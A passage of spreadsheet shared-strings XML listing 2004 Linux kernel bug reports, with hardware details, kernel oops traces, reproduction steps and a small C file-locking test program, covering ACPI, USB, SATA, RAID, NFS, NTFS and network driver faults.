    <t>2005-03-22 09:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian / unstable Hardware Environment: Laptop, Asus L3800C Software Environment: Desktop system, latest softwaresuspend patches from swsusp.sf.net, + acpi-20031002 Problem Description: keventd seems to hang after hibernating / resume, consuming a lot of CPU time if the lidswitch or another button is pressed while writing the caches to disk. Reloading the modules does not help, building all ACPI stuff static also shows this problem. The only way to get back to normal operation is a reboot. My initial bugreport on the swsusp-devel list about this issue can be found here: http://marc.theaimsgroup.com/?l=swsusp-devel&amp;m=107175625726022&amp;w=2 I noticed this problem first in december. This issue plays on the swsusp-devel list for some time now, according to the maintainer, Nigel, it seems to be related to ACPI. Also, there seems to be no output in dmesg of syslog, so I can hardly provide some 'hard facts' about this. Maybe someone (Nigel? Karol?) can give you more details on this. Steps to reproduce: Using softwaresuspend2, just pressing an 'event button' like the lidswitch while writing the caches to disk will result in keventd sucking CPU power when the machine is resumed.</t>
  </si>
  <si>
    <t>Request:  add iasl -d option to decode Buffers as Resource templates</t>
  </si>
  <si>
    <t>2004-01-12 10:28 UTC</t>
  </si>
  <si>
    <t>This is a feature request. Many systems have Buffers of Resource Templates that are not decoded with iasl. It would be nice if you add a flag to enable decoding buffers as resources. You could just print all Buffers as resource templates or (better) check for validity by at least looking for an end marker (0x79 0x00). Here is an example: Name (_CRS, Buffer (0x12) { 0x47, 0x01, 0x62, 0x00, 0x62, 0x00, 0x01, 0x01, 0x47, 0x01, 0x66, 0x00, 0x66, 0x00, 0x01, 0x01, 0x79, 0x00 })</t>
  </si>
  <si>
    <t>uhci; serial; Kobil Kaan USB smardcard reader doesn't work</t>
  </si>
  <si>
    <t>2004-01-12 12:22 UTC</t>
  </si>
  <si>
    <t>Armin Hassenpflug</t>
  </si>
  <si>
    <t>2004-10-07 13:56 UTC</t>
  </si>
  <si>
    <t>Bug known in 2.4.x. (uhci has problems with the usb-serial line of drivers). Workaround was to use "usb-uhci", but can't choose "usb-uhci" any more.</t>
  </si>
  <si>
    <t>Paul Osmialowski</t>
  </si>
  <si>
    <t>Johannes Peeters</t>
  </si>
  <si>
    <t>Wrong battery charging/Discharging bits information.</t>
  </si>
  <si>
    <t>2004-01-13 22:53 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:22 UTC</t>
  </si>
  <si>
    <t>Some laptop display "unkown" as current battery charging/Discharging state. That is confusing message.(According to ACPI spec 2.0b).</t>
  </si>
  <si>
    <t>uhci-hcd or hid modules stops working blocking usb mouse and module unloading</t>
  </si>
  <si>
    <t>2004-01-14 07:19 UTC</t>
  </si>
  <si>
    <t>Christoph Dahlen</t>
  </si>
  <si>
    <t>2004-05-11 13:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: AMD Athlon XP 2200+ on Via KT400 based board, 1GB Memory Software Environment: Gentoo Linux 1.4, Kernel 2.6 (and 2.6.1) Problem Description: The driver responsible for my Logitech USB Mouse (uhci/ehci-hcd or hid) crashes and prevents the mouse from working any more. While the mouse's internal LED stays lit, it's impossible to unload and reload any module any more, so only a reboot solves the problem. Reboot itself does not complete because it freezes when unloading other modules, like Alsa. Any attempt to rmmod hid even with "the force" results in another useless shell. Force module unload is enabled in Kernel. The problem occured with both Kernel 2.6.0 and 2.6.1. I have not yet figured out, what really provokes the crash, but it will occur sometime after system start. Shortest period was 30 minutes, longest 90 minutes. Steps to reproduce: - Start system - Wait. This are example outputs of /var/log/messages at module crash time: Jan 14 15:00:01 king kernel: drivers/usb/core/usb.c: deregistering driver hid Jan 14 15:00:01 king input.agent[5388]: ... no modules for INPUT product 3/46d/c00e/1100 Jan 14 15:00:01 king kernel: input: USB HID v1.10 Mouse [Logitech USB-PS/2 Optical Mouse] on usb-0000:00:10.0-2.2 Jan 14 15:00:01 king kernel: drivers/usb/core/usb.c: registered new driver hid Jan 14 15:00:01 king kernel: drivers/usb/input/hid-core.c: v2.0:USB HID core driver Jan 14 15:41:16 king kernel: [f78d82d0] link (378d81e2) element (378d9200) Jan 14 15:41:16 king kernel: Element != First TD Jan 14 15:41:16 king kernel: 0: [f78d9180] link (378d91c0) e3 Length=7 MaxLen=7 DT0 EndPt=0 Dev=3, PID=2d(SETUP) (buf=37439ae0) Jan 14 15:41:16 king kernel: 1: [f78d91c0] link (378d9200) e3 Length=7 MaxLen=7 DT1 EndPt=0 Dev=3, PID=69(IN) (buf=3743a6c0) Jan 14 15:41:16 king kernel: 2: [f78d9200] link (378d9240) e3 Stalled Babble Length=7ff MaxLen=3 DT0 EndPt=0 Dev=3, PID=69(IN) (buf=3743a6c8) Jan 14 15:41:16 king kernel: 3: [f78d9240] link (00000001) e3 IOC Active Length=0 MaxLen=7ff DT1 EndPt=0 Dev=3, PID=e1(OUT) (buf=00000000) Jan 14 15:41:16 king kernel: Jan 14 15:41:21 king kernel: usb 2-2: control timeout on ep0in Jan 14 15:41:41 king kernel: drivers/usb/core/usb.c: deregistering driver hid Jan 14 15:41:46 king kernel: usb 2-2.2: control timeout on ep0out Jan 14 14:38:42 king kernel: [f78db2d0] link (378db1e2) element (378e1200) Jan 14 14:38:42 king kernel: Element != First TD Jan 14 14:38:42 king kernel: 0: [f78e1180] link (378e11c0) e3 Length=7 MaxLen=7 DT0 EndPt=0 Dev=3, PID=2d(SETUP) (buf=322c47e0) Jan 14 14:38:42 king kernel: 1: [f78e11c0] link (378e1200) e3 Length=7 MaxLen=7 DT1 EndPt=0 Dev=3, PID=69(IN) (buf=36018780) Jan 14 14:38:42 king kernel: 2: [f78e1200] link (378e1240) e3 Stalled Babble Length=7ff MaxLen=3 DT0 EndPt=0 Dev=3, PID=69(IN) (buf=36018788) Jan 14 14:38:42 king kernel: 3: [f78e1240] link (00000001) e3 IOC Active Length=0 MaxLen=7ff DT1 EndPt=0 Dev=3, PID=e1(OUT) (buf=00000000) Jan 14 14:38:42 king kernel: Jan 14 14:38:47 king kernel: usb 2-2: control timeout on ep0in Jan 14 14:49:43 king kernel: drivers/usb/core/usb.c: deregistering driver hid Jan 14 14:49:48 king kernel: usb 2-2.2: control timeout on ep0out</t>
  </si>
  <si>
    <t>ACPI: SCI (IRQ20) allocation failed -- Pentium4HT+865G</t>
  </si>
  <si>
    <t>2004-01-14 07:32 UTC</t>
  </si>
  <si>
    <t>Kristof Petr</t>
  </si>
  <si>
    <t>2004-03-04 13:21 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1 Hardware Environment: MB - MSI Neo2 865G CPU - Pentium4 HT on board (intel chips): net, usb1, usb2, sound, vga cards: sata (SiI 3112A) Software Environment: kernel-smp-2.6.1-1.34 all needed packages installed Problem Description: Kernel 2.4 works fine. Kernel 2.6 boots, find all HW (net, usb, etc), load modules but none of net/usb/sound/sata is working. Part of error messages: ACPI: Subsystem revision 20031002 IOAPIC[0]: Set PCI routing entry (2-20 -&gt; 0xa9 -&gt; IRQ 20 Mode:1 Active:1) ACPI: SCI (IRQ20) allocation failed ACPI-0133: *** Error: Unable to install System Control Interrupt Handler, AE_NOT_ACQUIRED ACPI: Unable to start the ACPI Interpreter Trying to free free IRQ20ACPI: ACPI tables contain no PCI IRQ routing entries PCI: Invalid ACPI-PCI IRQ routing table PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Ignoring BAR0-3 of IDE controller 0000:00:1f.1 Transparent bridge - 0000:00:1e.0 PCI: Using IRQ router PIIX/ICH [8086/24d0] at 0000:00:1f.0 PCI BIOS passed nonexistent PCI bus 0! PCI BIOS passed nonexistent PCI bus 0! PCI BIOS passed nonexistent PCI bus 0! The complet dmesg files from 2.4 and 2.6 booting and /proc/pci listing are on http://crash.fce.vutbr.cz/report/ Steps to reproduce: boot system</t>
  </si>
  <si>
    <t>stale NFS file handles with 2.6.1 on NFS-mounted /home</t>
  </si>
  <si>
    <t>2004-01-14 23:23 UTC</t>
  </si>
  <si>
    <t>Peter K. M</t>
  </si>
  <si>
    <t>2004-06-29 09:07 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 7.3 Hardware Environment: AMD Athlon 1800 XP(serv1)/PIII-600(comp1) Software Environment: Problem Description: client to nfs server gets NFS stale file handles Steps to reproduce: o export home directories, in /etc/exports: /home comp1 (rw,no_root_squash) o import on comp1, in /etc/fstab: serv1:/home /home nfs defaults,bg,rsize=8192,wsize=8192 0 0 o perform some operations in /home on the client, ie - ls -laFR - du - start KDE</t>
  </si>
  <si>
    <t>Martin Lorenz</t>
  </si>
  <si>
    <t>Anatoly Volodko</t>
  </si>
  <si>
    <t>io_md</t>
  </si>
  <si>
    <t>SiI 3112 &amp; Asus MBoard &amp; WD Raptor cause complete hang with DMA and heavy load</t>
  </si>
  <si>
    <t>2004-01-16 04:13 UTC</t>
  </si>
  <si>
    <t>Joe Rutledge</t>
  </si>
  <si>
    <t>2004-03-25 19:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: Asus A7N8X Deluxe (nforce2) BIOS V1007, AMD Athlon XP (Barton) 2800+, 1GB DDR RAM (2 x 512 as Dual Channel), WD Raptor 36G SATA HD, Asus GeForce FX 5600 (256MB), Lite-On 52x CDRW, DVD-ROM. Software Environment: Fresh Gentoo build optimised for Athlon-XP (GCC 3.2.3 -march athlon-xp). 2.6.1 kernel patched for forcedeth and nvidia graphics card. APIC &amp; ACPI support removed from kernel and turned off in BIOS. Both the IDE and libata drivers have been built into the kernel at separate times. It makes no difference what other applications are running. Problem Description: Initially using a Seagate drive I was experiencing random lockups, no kernel panic just a complete hang. Having read about issues with DMA and some Seagates I replaced the drive with a Western Digital Raptor. However I still see the same lockups. I've tried a variety of options to hdparm (based around -X70 -d1) none of them making any difference to stability. I then swapped to the libata driver expecting this to be more solid. It does appear to last a little longer than the IDE driver but the same problems manifest themselves. I then found that there were potentially some problems with the Asus board and shared interrupt lines to the SiI3112 so I upgraded the BIOS to the most recent version (1007). This has made no difference whatsoever. I also read that APIC and ACPI support could exascerbate this problem no I removed them from the kernel and disabled them in the BIOS. This has given better stability but still not to the point of a usable system. This is a desktop system and it will become locked if any heavy disk access is done. At the moment I'm running in PIO mode as this is the only stable way of handling the disk. I'm not doing any RAID and have no need to. Steps to reproduce: Merely a boot of my 2.6.1/2.6.0/2.4.24 system to runlevel 1 and then running bonnie++ -u nobody will guarantee a hang before all the write checks have been completed.</t>
  </si>
  <si>
    <t>Loop device on Raid0 volume</t>
  </si>
  <si>
    <t>2004-01-16 08:15 UTC</t>
  </si>
  <si>
    <t>2004-12-03 00:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core Hardware Environment: I386 Intel ICH5 SATA Software Environment: kernel 2.6.1 Problem Description: The only way to work with SATA RAID Intel ICH5 volumes now is to create MD raid0 and then manually create loop devices for partitions. raidtab: sda+sdb -&gt; md0 (raid0,superblock,chunk size 128k) raidstart /dev/md0 losetup -o 32256 /dev/loop0 /dev/md0 mkfs /dev/loop0 mount -t ext2 /dev/loop0 /mydisk Raid0 require bio-&gt;bi_vcnt = 1, i.e. no bio-chains, only one bio per request. But loop-device (loop.c) doesn't guarantee this and doesn't try to merge bio- blocks. So on big (&gt;&gt; chunk) files we periodically traps to error (&gt;1 bio-block per request): raid0_make_request bug: can't convert block across chunks Steps to reproduce: 1.Create Raid0 volume /dev/md0 with chunk=128 kbytes for example, SATA drives (sda,sdb) I am not sure but possibly error exists too if chunk=default=pagesize and on any other drives 2.Map /dev/md0 to LOOP-device (may be with some offset): losetup -o 32256 /dev/loop0 /dev/md0 3.Create Ext2 FS on this Loop 4.Mount it 5.Copy many big files there (&gt;1 mb) 6.Read files extensively 7.See kernel log: raid0_make_request bug: can't convert block across chunks drivers\md\Raid0.c: static int raid0_make_request (request_queue_t *q, struct bio *bio) { ... if (unlikely(chunk_sects &lt; (bio-&gt;bi_sector &amp; (chunk_sects - 1)) + (bio- &gt;bi_size &gt;&gt; 9))) { struct bio_pair *bp; /* Sanity check -- queue functions should prevent this happening */ if (bio-&gt;bi_vcnt != 1 || bio-&gt;bi_idx != 0) goto bad_map; ... bad_map: printk("raid0_make_request bug: can't convert block across chunks" " or bigger than %dk %llu %d\n", chunk_size, (unsigned long long)bio-&gt;bi_sector, bio-&gt;bi_size &gt;&gt; 10); bio_io_error(bio, bio-&gt;bi_size); return 0; }</t>
  </si>
  <si>
    <t>Kernel Oops when initializing (2.6.1, Athlon XP2000+)</t>
  </si>
  <si>
    <t>2004-01-17 11:24 UTC</t>
  </si>
  <si>
    <t>Berthold H</t>
  </si>
  <si>
    <t>2004-06-20 21:39 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 Hardware Environment: Athlon XP2000+, ASRock K7VT2 Software Environment: gcc 3.3.2 Problem Description: I compiled Linux 2.6.1 on my SuSE 9.0 System using gcc 3.3.2. With a 132x44 VGA screen, all I see (copied by hand, so I'm shure there will be mistakes): Processor #0 6:8 APIC version 16 APIC: IOAPIC (id[0x02] address [0xfec00000] global irq base [0x0]) IOAPIC[0]: Assigned apic_id 2 IOAPIC[0]: apic_id 2, version 3, address 0xfec00000, IRQ 0-23 APIC: INT_SRV_OVR (bus[0] irq[0x0] global_irq[0x2] polarity[0x0] trigger[0x0]) APIC: INT_SRV_OVR (bus[0] irq[0x2] global_irq[0x9] polarity[0x3] trigger[0x3]) Enabling APIC mode: Flat. Using 1 I/O APICs USING ACPI (MADT) for SMP configuration information Building zonelist for node : 0 Kernel command line: vga=ask Initializing CPU#0 PID hash table entries: 2048 (order 11: 16384 bytes) Detected 1667.002 MHz processor. Using tsc for high-res timesource Console: colour VGA+ 132x44 Memory: 515056k/524224k available (1989k kernel code, 8424k reserved, 719k data, 276k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode...&lt;i&gt;Unable to handle Kernel paging request at virtual address fffd2000 printing eip: c03b7036 *pde = 00002067 *pte = 00101025 Oops: 0003 [#1] CPU: 0 EIP: 0060:[&lt;c0337036&gt;] Not tainted EFLAGS: 00010206 EIP is at test_wp_bit+0x36/0x90 eax: 00000001 ebx: 00000114 ecx: 00101025 edx: 00002027 esi: 000002cf edi: 000007c5 ebp: 00000009 esp: c03a7f88 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c03a60000 task=c0333c0) Stack: 0000002d 00101000 00000025 c03b773d c03029e0 0007dbf0 0007ffc0 000007cb 000020e8 000002cf 00000114 00000000 004ffd80 0001fff0 c1000000 00000000 0001fff0 0000083d 00000000 00099800 c0105000 0008e000 c03a8453 c02fac22 Call Trace: [&lt;c03b773d&gt;] mem_init+0x22d/0x240 [&lt;c0103000&gt;] _stext+0x0/0x30 [&lt;c03a8453&gt;] start_kernel+0xd3/0x390 [&lt;c03a80f0&gt;] unknown_bootoption+0x0/0x170 Code: 88 15 00 20 fd ff 31 c0 c7 04 24 2d 00 00 00 e7 44 24 04 00 &lt;0&gt;Kernel panic: Attemted to kill the idle task! In idle task - not syncing Steps to reproduce: I Just compiled, installed and tried to boot the kernel. ksymoops -L -o /lib/modules/2.6.1/ -v /usr/src/linux/vmlinux -K -m /usr/src/linux/System.map &lt; Oops0003&gt;Oops0003.ksymoops2 gave me (in Oops0003.ksymoops2): ksymoops 2.4.9 on i686 2.4.21-166-athlon. Options used -v /usr/src/linux/vmlinux (specified) -K (specified) -L (specified) -o /lib/modules/2.6.1/ (specified) -m /usr/src/linux/System.map (specified) No modules in ksyms, skipping objects Checking if this processor honours the WP bit even in supervisor mode...&lt;i&gt;Unable to handle Kernel paging request at virtual address fffd2000 c03b7036 *pde = 00002067 Oops: 0003 [#1] CPU: 0 EIP: 0060:[&lt;c0337036&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010206 eax: 00000001 ebx: 00000114 ecx: 00101025 edx: 00002027 esi: 000002cf edi: 000007c5 ebp: 00000009 esp: c03a7f88 ds: 007b es: 007b ss: 0068 Stack: 0000002d 00101000 00000025 c03b773d c03029e0 0007dbf0 0007ffc0 000007cb 000020e8 000002cf 00000114 00000000 004ffd80 0001fff0 c1000000 00000000 0001fff0 0000083d 00000000 00099800 c0105000 0008e000 c03a8453 c02fac22 Call Trace: [&lt;c03b773d&gt;] mem_init+0x22d/0x240 [&lt;c0103000&gt;] _stext+0x0/0x30 [&lt;c03a8453&gt;] start_kernel+0xd3/0x390 [&lt;c03a80f0&gt;] unknown_bootoption+0x0/0x170 Code: 88 15 00 20 fd ff 31 c0 c7 04 24 2d 00 00 00 e7 44 24 04 00 &gt;&gt;EIP; c0337036 &lt;kern_table+4b6/5d8&gt; &lt;===== &gt;&gt;esp; c03a7f88 &lt;init_thread_union+1f88/2000&gt; Trace; c03b773d &lt;mem_init+22d/240&gt; Trace; c0103000 &lt;pg1+0/1000&gt; Trace; c03a8453 &lt;start_kernel+d3/380&gt; Trace; c03a80f0 &lt;unknown_bootoption+0/170&gt; Code; c0337036 &lt;kern_table+4b6/5d8&gt; 00000000 &lt;_EIP&gt;: Code; c0337036 &lt;kern_table+4b6/5d8&gt; &lt;===== 0: 88 15 00 20 fd ff mov %dl,0xfffd2000 &lt;===== Code; c033703c &lt;kern_table+4bc/5d8&gt; 6: 31 c0 xor %eax,%eax Code; c033703e &lt;kern_table+4be/5d8&gt; 8: c7 04 24 2d 00 00 00 movl $0x2d,(%esp,1) Code; c0337045 &lt;kern_table+4c5/5d8&gt; f: e7 44 out %eax,$0x44 Code; c0337047 &lt;kern_table+4c7/5d8&gt; 11: 24 04 and $0x4,%al &lt;0&gt;Kernel panic: Attemted to kill the idle task!</t>
  </si>
  <si>
    <t>ohci1394 crash on AMD64 (SuSE 9.0)</t>
  </si>
  <si>
    <t>2.6.1-bk4, 2.6.1-mm4</t>
  </si>
  <si>
    <t>2004-01-17 15:19 UTC</t>
  </si>
  <si>
    <t>2004-04-05 10:15 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 64-bit (x86_64) Hardware Environment: 2 x AMD Opteron 240, Tyan Thunder K8W, 1 GB RAM (4 x 256, two nodes, dual-channel), Adaptec AHA19160 + SCSI CD-RW (Toshiba), LSI 53C1010 64-bit SCSI + 2 x HDD (IBM), NEC-based USB 2.0 adapter (Manhattan), GeForce FX5200 (LeadTek), SATA HDD (Seagate), IDE DVD (Liteon) Software Environment: Out-of-the box SuSE 9.0 (downloadable version) + Linux 2.6.1-* Problem Description: The kernel crashes immediately after modprobe ohci1394 Here's the log from a serial console: SysRq : Changing Loglevel Loglevel set to 9 ohci1394: $Rev: 1097 $ Ben Collins &lt;bcollins@debian.org&gt; ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[19] MMIO=[fc8ff000-fc8ff7ff] Ma] NMI Watchdog detected LOCKUP on CPU1, registers: CPU 1 Pid: 5662, comm: modprobe Not tainted RIP: 0010:[&lt;ffffffffa00509f3&gt;] &lt;ffffffffa00509f3&gt;{:ieee1394:hpsb_register_addrs} RSP: 0018:000001003d7e3a88 EFLAGS: 00000087 RAX: 000001003d756488 RBX: 0000fffff0000400 RCX: 000001001d232750 RDX: 000001003d756488 RSI: 00000000000000d0 RDI: 000001001fffe220 RBP: 000001001d232740 R08: 0000fffff0000400 R09: 000001003f0a9000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000fffff0000000 R13: ffffffffa0061e20 R14: 000001003d754000 R15: 0000000000000000 FS: 00000000005144a0(0000) GS:ffffffff80495c40(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000002a95578000 CR3: 000000003ff9b000 CR4: 00000000000006a0 Process modprobe (pid: 5662, stackpage=1001f22b400) Stack: ffffffff80492100 ffffffffa0061d60 0000000000000202 000001003d754000 000001003d754000 0000000000000000 000001003d7e3b68 000001003d7e3bb8 000001003d754000 ffffffffa005151e Call Trace:&lt;ffffffffa005151e&gt;{:ieee1394:add_host+46} &lt;ffffffffa005074e&gt;{:ieee13 &lt;ffffffffa004f7f9&gt;{:ieee1394:hpsb_add_host+9} &lt;ffffffffa0068eeb&gt;{:ohci13 &lt;ffffffff8021116c&gt;{pci_device_probe+124} &lt;ffffffff802573f7&gt;{bus_matc+71 &lt;ffffffff802575e6&gt;{driver_attach+70} &lt;ffffffff802576ae&gt;{bus_add_drive+1 &lt;ffffffff80211551&gt;{pci_register_driver+113} &lt;ffffffffa006f00d&gt;{:ohci1394 &lt;ffffffff80152f5b&gt;{sys_init_module+6507} &lt;ffffffff801d0c93&gt;{journal_stop &lt;ffffffffa004d490&gt;{:ieee1394:hpsb_bus_reset+0} &lt;ffffffff801cbb2d&gt;{__ext3 &lt;ffffffff8017857e&gt;{filp_close+126} &lt;ffffffff8010dfc4&gt;{system_call+124} Code: 4c 39 60 38 48 89 c2 76 ea f0 81 05 b9 12 01 00 00 00 00 01 console shuts up ... Steps to reproduce: Try to modprobe ohci1394</t>
  </si>
  <si>
    <t>2.6.11</t>
  </si>
  <si>
    <t>Invalid data on used disk space with NTFS</t>
  </si>
  <si>
    <t>2004-01-17 16:49 UTC</t>
  </si>
  <si>
    <t>Haakon Riiser</t>
  </si>
  <si>
    <t>2004-01-19 06:20 UTC</t>
  </si>
  <si>
    <t>Anton Altaparmakov</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: Athlon XP2500+, nForce2 Software Environment: Problem Description: Reported disk usage under NTFS is often different from what is returned under 2.4, and by Windows itself. The number of allocated blocks is especially far off on the directory containing the Windows operating system (i.e., C:\WINDOWS). In my case, Linux 2.6.1 reports the disk space used by C:\WINDOWS to be 20% larger than the total size of the file system! Here's an example (du is run in the root of what is my C: drive): 0 AUTOEXEC.BAT 0 CONFIG.SYS 43M Documents and Settings 0 IO.SYS 0 MSDOS.SYS 48K NTDETECT.COM 366M Program Files 0 RECYCLER 20K System Volume Information 12G WINDOWS 0 boot.ini 232K ntldr 768M pagefile.sys Same command under 2.4: 0 AUTOEXEC.BAT 0 CONFIG.SYS 41M Documents and Settings 0 IO.SYS 0 MSDOS.SYS 48K NTDETECT.COM 366M Program Files 2.0K RECYCLER 21K System Volume Information 1.4G WINDOWS 1.0K boot.ini 230K ntldr 770M pagefile.sys Steps to reproduce: Mount the parition containing C:\WINDOWS and run "du -s". Compare with what is reported under 2.4 or by Windows itself. (Note that I am using Windows XP; I don't know if this is reproducible with other versions of Windows.)</t>
  </si>
  <si>
    <t>Kernel panic in drivers/net/fealnx.c interrupt handler.</t>
  </si>
  <si>
    <t>2004-01-18 03:10 UTC</t>
  </si>
  <si>
    <t>Andreas Henriksson</t>
  </si>
  <si>
    <t>2004-05-16 05:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge (Testing) Hardware Environment: Pentium 166MHz, 40mb Ram, Realtek 8139, Surecom (fealnx) Software Environment: Gateway with NAT and some filtering plus a couple of HTB rules to stop bittorrent from eating up all my upstream bandwitdth (which is only 1/10 of my downstream). Problem Description: My gateway machine running NAT for my workstation has had several kernel panics. About one per week. (Although I booted it up just before starting to write this and got one before I finished writing it, so it's totally "random".) I have, with the help from people at #kernelnewbies (specially thanks goes to coderock), debugged it and found that the problem is at line 1520 in drivers/net/fealnx.c http://lxr.linux.no/source/drivers/net/fealnx.c?v=2.6.0#L1520 np-&gt;cur_tx-&gt;skbuff somehow is NULL there.... and get dereferenced in the inlined function dev_kfree_skb_irq(). (for the whole story see: http://www.fjortis.info/pub/panic/my-debugging.txt ) I've previously posted information about this to linux-net and linux-kernel. http://marc.theaimsgroup.com/?l=linux-net&amp;m=107360949210508&amp;w=2 http://www.ussg.iu.edu/hypermail/linux/kernel/0401.1/0281.html Here's one kernel panic: EIP: 0060:[&lt;c3834473&gt;] Not tainted EFLAGS: 00010206 EIP is at intr_handler+0x173/0x390 [fealnx] eax: 00207aee ebx: 00000000 ecx: c294c040 edx: 00000000 esi: c125ea00 edi: 00000018 ebp: 00000002 esp: c033bf44 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo:c033a000, task: c02ce4c0) Stack: 00006144 00006134 00006100 00006138 00000001 00000014 c2911620 04000001 00000000 c033bfb0 c010a091 0000000a c125e800 c033bfb0 0000000a 00000140 c0339b40 c2911620 c010a320 0000000a c033bfb0 c2911620 c033a000 000a0600 Call Trace: [&lt;c010a091&gt;] handle_IRQ_event+0x31/0x60 [&lt;c010a320&gt;] do_IRQ+0x70/0xe0 [&lt;c0105000&gt;] _stext+0x0/0x20 [&lt;c0108c68&gt;] common_interrupt+0x18/0x20 [&lt;c0106b30&gt;] default_idle+0x0/0x30 [&lt;c0105000&gt;] _stext+0x0/0x20 [&lt;c0106b54&gt;] default_idle+0x24/0x30 [&lt;c0106bc5&gt;] cpu_idle+0x25/0x40 [&lt;c033c66d&gt;] start_kernel+0x15d/0x190 Code: ff 8a 98 00 00 00 0f 94 c0 84 c0 0f 85 84 01 00 00 8b 86 a8 &lt;0&gt;Kernel panic: Fatal exception in interrupt In interupt handler - not syncing I'm keeping information about this at http://fjortis.info/pub/panic/ so have a look there for more panic's and other information. Steps to reproduce: Use the fealnx driver and send some traffic over it.... (bittorrent seems to be the perfect killer. Atleast it happens here alot when I have a couple of torrents running.)</t>
  </si>
  <si>
    <t>(net b44) timeout waiting for bit 80000000 of register 428 to clear</t>
  </si>
  <si>
    <t>2004-01-19 01:37 UTC</t>
  </si>
  <si>
    <t>Tommaso Di Donato</t>
  </si>
  <si>
    <t>2005-06-04 11:28 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9.0 Hardware Environment: HP-Compaq D230 Microtower Software Environment: Kernel 2.6.1 Problem Description: When I load my b44 module, I have no error at all. But when I try to configure my ethernet, and brind it up, I receive the following message (3/4 time repeated): b44: eth0: BUG! Timeout waiting for bit 80000000 of register 428 to clear. After that, if i check with ifconfig eth0, seems to be ok, but the leds on the NIC don't blink, and /var/log/message reports kernel: b44: eth0: Link is down The nic is working on a 2.4.20 kernel. Steps to reproduce: ifconfig eth0 up</t>
  </si>
  <si>
    <t>NFS file locking problem with 2.6 clients</t>
  </si>
  <si>
    <t>2004-01-19 07:49 UTC</t>
  </si>
  <si>
    <t>Dr Eva Myers</t>
  </si>
  <si>
    <t>Distribution: Debian 3.0-bunk-2 (woody) Hardware Environment: Pentium IV (2.6 server) AMD Athlon (2.6 client, 2.4 client and server) Software Environment: Gnu C 2.95.4 Gnu make 3.79.1 util-linux 2.12 mount 2.12 module-init-tools 3.0-pre5 e2fsprogs 1.34 nfs-utils 1.0.6 Linux C Library 2.2.5 Dynamic linker (ldd) 2.2.5 Procps 3.1.15 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 2.0.11 Modules Loaded 3c59x Problem Description: Steps to reproduce: I'm going to assume that your home directory is NFS-mounted and you are logged into a client rather than the server. Create a file lockfile.c containing the following short program which locks a file then waits for you to hit Enter before unlocking it. #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; int main (int argc, char* argv[]) { char* file = argv[1]; int fd; struct flock lock; printf ("opening %s\n", file); /* Open a file descriptor to the file. */ fd = open (file, O_WRONLY); printf ("locking\n"); /* Initialize the flock structure. */ memset (&amp;lock, 0, sizeof(lock)); lock.l_type = F_WRLCK; /* Place a write lock on the file. */ fcntl (fd, F_SETLKW, &amp;lock); printf ("locked; hit Enter to unlock... "); /* Wait for the user to hit Enter. */ getchar (); printf ("unlocking\n"); /* Release the lock. */ lock.l_type = F_UNLCK; fcntl (fd, F_SETLKW, &amp;lock); close (fd); return 0; } Run "gcc -o lockfile lockfile.c". Run "lockfile foo" where foo is a file in your home directory. Before pressing return, run "lockfile foo" in another window. It will print "locking" and then block. Go back to the first window and hit enter to unlock the file. BUG HERE: The second window will hang for a while (over 30 seconds, but not indefinitely) before getting the lock. I ran this test on several combinations of server and client. The hang occurred with the client and server both running 2.6.1, and also with a 2.6.1 client and a 2.4.23 server. However, it did not hang with a 2.4.23 client and a 2.6.1 server, or with both client and server running 2.4.23. Nor did it hang when I tried the test on a local file, either with kernel 2.6.1 or kernel 2.4.23.</t>
  </si>
  <si>
    <t>missing information on how to get added to relevant mailing lists</t>
  </si>
  <si>
    <t>n/a</t>
  </si>
  <si>
    <t>2004-01-20 03:06 UTC</t>
  </si>
  <si>
    <t>2004-01-20 08:23 UTC</t>
  </si>
  <si>
    <t>Howdy, How does one get added to the "default" owner mailing list for a given category? for example, how do I get added to the drivers_sound@kernel-bugs.osdl.org mailing list? I realize it's probably by contacting someone, but if that information were in the FAQ (including who to contact...) I wouldn't be opening a bug report against it :-) Apologies in advance if it's already mentioned somewhere - I looked and didn't see it. Cheers, Muli</t>
  </si>
  <si>
    <t>2004-01-20 11:04 UTC</t>
  </si>
  <si>
    <t>Many OEMs are using the _OSI method instead of the \_OS namespace object as a way of triggering OS-specific portions of ASL. Unfortunately, it appears that ACPI-CA doesn't yet implement _OSI or allow it to be overridden. Please add this capability.</t>
  </si>
  <si>
    <t>atyfb - no text in console, broken screen</t>
  </si>
  <si>
    <t>2004-01-20 15:13 UTC</t>
  </si>
  <si>
    <t>Pavel Kysilka</t>
  </si>
  <si>
    <t>2005-08-15 17:42 UTC</t>
  </si>
  <si>
